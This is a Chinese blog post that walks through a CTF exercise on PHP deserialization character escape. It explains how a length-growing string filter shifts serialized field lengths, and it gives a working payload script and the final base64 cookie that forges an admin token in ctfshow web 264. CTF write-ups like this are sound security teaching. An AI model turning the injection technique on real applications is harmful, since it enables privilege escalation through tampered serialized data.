ctf 反序列化字符逃逸

最新推荐文章于 2024-02-22 18:00:44 发布
最新推荐文章于 2024-02-22 18:00:44 发布
阅读量882 收藏 1
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/111318614
版权

第一种,关键词过滤,变多的
比如0ctf :piapiapia
我先说一次什么是反序列化字符逃逸。

    <?php
     
    class user{
        public $user = 'admin';
        public $pass = 'passwd';
    }
     
     
    $a = new user();
    $b = serialize($a);
     
    echo $b."<br>";
     
     
    $c = unserialize($b);
     
    echo $c->pass;
     
     ?>

在这里插入图片描述

序列化后的字符串应该能看出来,大括号外面有类名及长度,括号里面以分号划分多个变量,包含其变量名及长度,变量值及长度。

这些都是对应好的,而如果我们对比如user的值进行修改,改为admin1,而长度不变,当反序列化时就会报错。

    <?php
     
        $a = 'O:4:"user":2:{s:4:"user";s:5:"admin1";s:4:"pass";s:6:"passwd";}';
        $b = unserialize($a);
        echo $b->pass;
     ?>

在这里插入图片描述
说明函数长度不等会报错,很重要,当读入s:5:时,系统就知道后面引号内是字符串且长度为5,于是从双引号开始读入长度为5的字符,但由于admin1是6个字符,导致后面第6个字符该是双引号来结束,却没有,由此产生异常。而如果我们设置的payload则可以越过这个异常。

···

<?php
 
function filter($str){
    $str = str_replace("ab","ccc",$str);
    return $str;
}
class user{
    public $user = 'ababababababababababababababababababababababababab";s:4:"pass";s:4:"hack";}';
    public $pass = 'passwd';
}
 
 
$a = new user();
echo serialize($a)."<br>";
 
$b = filter(serialize($a));
 
echo $b."<br>";
 
$c = unserialize($b);
 
echo $c->pass;
 
 
 
?>

其中,user的值有25个ab,经序列化后又对其进行替换,每替换一个ab,就多一个字符,这样就可能会导致前面所说的系统知道的长度和实际长度不对应,就会报错,但后面的payload=";s:4:“pass”;s:4:“hack”;},这样就拼接起来,具体来说

初始序列化后为

在这里插入图片描述
可见长度为75,payload长度是为25,所以这里使用了25个ab,当替换后就多出25个字符。待替换后就为:

O:4:"user":2:{s:4:"user";s:75:"ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc";s:4:"pass";s:4:"hack";}";s:4:"pass";s:6:"passwd";}

你可以知道,c的个数刚好为75个,而系统读入了75个字符想碰到双引号也成功,之后就会继续反序列化我们的payload,而在大括号之后的字符都会被挤进下一个参数中。

现在我们来写一下ctfshow web 264

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
session_start();

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    $_SESSION['msg']=base64_encode($umsg);
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

hint :message.php

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 15:13:03
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
session_start();
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_SESSION['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}

分析源代码:
在这里插入图片描述
在这里插入图片描述
目的很清楚,就是要把user换成admin,那怎么样去实现的?
关键代码

$umsg = str_replace('fuck', 'loveU', serialize($msg));

他可以把fuck换为loveu,那我们这样想,按照之前的想法,每替换一个,就会多出来一个字母,逃逸出去,如果我们可以构造出来多余的部分
也就是说我们变量t后面就是要替换的,那我们先构造payload:

$t= ?+";s:5:"token";s:5:"admin";}';

然后我们知道";之后开始算数后面为

";s:5:"token";s:5:"admin";

不算’和;
在这里插入图片描述

计算出来要27个字符,也就是说我们要构造27个fuck不停的替换,最后把user替换成admin
那好,我们现在来接着构造
?=fuck*27+";s:5:“token”;s:5:“admin”;
完整的payload

<?php
class message{
   public $from;
   public $msg;
   public $to;
   public $token='user';
   public function __construct($f,$m,$t){
       $this->from = $f;
       $this->msg = $m;
       $this->to = $t;
   }
}
$f=0;
$m=0;
$t='fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';
//计算公式=2+你序列化之后的数字    2代表";,最后';是不算的
$msg = new message($f,$m,$t);
$umsg = str_replace('fuck', 'loveU', serialize($msg));
echo $umsg ;
echo "\n";
echo base64_encode($umsg);
?>

把base64编码后的结果放到cookie里面访问message.php就能拿到flag

Tzo3OiJtZXNzYWdlIjo0OntzOjQ6ImZyb20iO2k6MDtzOjM6Im1zZyI7aTowO3M6MjoidG8iO3M6MTM1OiJsb3ZlVWxvdmVVbG92ZVVsb3ZlVWxvdmVVbG92ZVVsb3ZlVWxvdmVVbG92ZVVsb3ZlVWxvdmVVbG92ZVVsb3ZlVWxvdmVVbG92ZVVsb3ZlVWxvdmVVbG92ZVVsb3ZlVWxvdmVVbG92ZVVsb3ZlVWxvdmVVbG92ZVVsb3ZlVWxvdmVVbG92ZVUiO3M6NToidG9rZW4iO3M6NToiYWRtaW4iO30iO3M6NToidG9rZW4iO3M6NDoidXNlciI7fQ
jing!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之php反序列化字符逃逸
世间繁华梦一出
06-08 429
首先源代码如下 <?php include_once 'flag.php'; highlight_file(__FILE__); // Security filtering function function filter($str){ return str_replace('secure', 'secured', $str); } class Hacker{ public $username = 'margin';
CTFshow新春欢乐赛--web6--反序列化字符逃逸
unexpectedthing的博客
02-09 1824
web6 考点:反序列化数组+字符逃逸 这道题还是挺有意思的,首先看代码 <?php error_reporting(0); highlight_file(__FILE__); $function = $_GET['POST']; function filter($img){ $filter_arr = array('ctfshow','daniu','happyhuyear'); $filter = '/'.implode('|',$filter_arr).'/i';
CTF-php反序列化入门进阶
最新发布
Mssqj的博客
02-22 386
如果一个类中定义了__get()方法,那么当我们试图获取该类的一个不存在或无法访问的属性时,该方法会被自动调用,从而可以对该操作进行处理。类中)去找$a()这种形式的,,找到$bb(),它对应的参数是su,且在类llovetxm里 特征 $*****();首先找切入点-------找到NISA类invoke的eval()函数,并且参数可控,则思路正确,这是一个正确的方向。shell写flag.php就不对了,然而写/flag时就对了,很奇怪,所以不出答案时,多试一试,改一改。,同样改为上一个类的对象。
unctf easy_serialize反序列化字符逃逸
qq_51796436的博客
01-29 345
web题难度适中。
一天一道ctf 第30天(反序列化字符逃逸
scrawman的博客
07-12 178
[安洵杯 2019]easy_serialize_php <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION)
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 1666
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP的反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
php反序列化长度变化尾部字符逃逸(0CTF-2016-piapiapia)
10-15
主要介绍了0CTF-2016-piapiapia(php反序列化长度变化尾部字符逃逸),本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
PHP反序列化漏洞详解.rar
02-07
PHP反序列化漏洞详解-CTF
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具
08-15
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具,ActiveMQ,漏洞,反序列化漏洞,CVE-2015-5254,利用工具,工具
反序列化字符逃逸问题
Whaocai的博客
08-10 213
字符逃逸的本质是替换后字符长度发生了改变。 两种情况:①替换后字符长度增加②替换后字符长度减少
PHP反序列化字符逃逸
blue_fantasy的博客
01-09 525
Text. 0x00 前提 掌握PHP反序列化的原理,序列化的对应内容及POP链构造。可参看: https://xz.aliyun.com/t/3674,https://xz.aliyun.com/t/6454 PHP的反序列化特点: 01.PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。例如下图超出的abcd部分并不会被反序列化成功。 02.当长度不对应的时
ctf之php反序列化字符串数组逃逸(转自最详细的大佬)2021-9-9
qq_45290991的博客
09-09 608
[0CTF 2016]piapiapia WP(详细) 1.打开网站,是个登录框,尝试注入无果.....按道理来说就是注入了啊喂 2.玄学时间到:::       目录扫完啥结果没有。在buuctf做题总是这样...
python每个模块用函数来实现_Python 模块,函数
weixin_39940253的博客
11-24 251
目录1、函数的基础知识2、各类的特殊函数3、getpass模块4、time模块5、datetime模块6、random模块7、os模块8、sys模块9、hashlib模块10、logging模块11、configparser模块12、re模块13、json模块14、socket模块15、subprocess模块16、socketserver模块17、tkinter模块函数的基础知识模块和包:其实就...
CTF(pwn)-格式化字符串漏洞讲解(二) --攻防世界CGfsb
半岛铁盒的博客
02-25 1018
一.分析 pwnme的地址为0x804A068 思路: 利用格式化字符串漏洞来使 pwnme的值为8; 二.做题过程 首先,我们得查一下我们输入进去的数据在栈中偏移了多少,知道偏移量后我们才能将其对应起来
部分ctf-web题解
weixin_66669317的博客
12-06 1363
ctfweb部分题解
三、Web漏洞-反序列化
weixin_70557959的博客
05-11 3551
37、WEB漏洞-反序列化之PHP(上) 原理 PHP 反序列化原理: 1.未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL 注入,目录遍历等不可控后果。 2.其实跟文件解析差不多,都是由于传递的恶意参数被执行(序列化和反序列化相当于加解密过程) 3.在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。 ---序列化函数:serialize() //将一个对象转换成一个字符串 ...
一天一道ctf 第33天(反序列化字符逃逸
scrawman的博客
07-15 249
看界面很像sql注入,但是试了几次发觉不太行。dirsearch扫一下目录,找到了www.zip文件。 profile.php里有反序列化的代码,应该可以利用: <?php require_once('class.php'); if($_SESSION['username'] == null) { die('Login First'); } $username = $_SESSION['username']; $profile=$user->show_profile($use.
一道ctf题关于php反序列化字符逃逸
BerL1n
07-18 2358
2019强网杯 easy_sql 这题知识点堆叠注入;以前还未遇到过 这是过滤掉的内容,因此常见的注入方式我们是不能再使用了。 然后提交试试。发现似乎是直接把返回的原始数据给返回了。 3.然后来测试一下有没有注入,似乎是有的。 /?inject=1%27or+%271%27%3D%271 /?inject=1’ or ‘1’='1 4.来检查一下过滤情况,过滤函数如下。 过滤了 select,u...
PHP反序列化漏洞 ctfhub
07-28
PHP反序列化漏洞是一种常见的Web应用程序漏洞,它允许攻击者通过操纵序列化和反序列化过程来执行恶意代码。这种漏洞通常出现在PHP应用程序中,特别是在使用不安全的反序列化函数(如`unserialize()`)时。 CTFHub是一个CTF(Capture The Flag)平台,旨在提供安全竞赛和训练平台,供安全爱好者学习和应对各种网络安全挑战。在CTFHub中,可能会涉及到PHP反序列化漏洞作为一个题目或挑战,参与者需要通过利用该漏洞来获取目标系统的控制权或敏感信息。 为了防止PHP反序列化漏洞,开发人员应该采取以下几个措施: 1. 验证和过滤用户输入:确保反序列化的数据来自可信任的来源,并对输入进行严格的验证和过滤,以防止恶意数据的注入。 2. 使用安全的序列化库:使用经过审计和被广泛接受的序列化库,如JSON或Protocol Buffers,而不是不安全的`unserialize()`函数。 3. 最小化反序列化操作:只反序列化必要的数据,并避免反序列化不受信任的或未知的数据。 4. 对敏感数据进行加密:如果必须在序列化过程中传输敏感数据,应该对其进行加密,以防止泄露。 希望以上信息对你有所帮助。如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值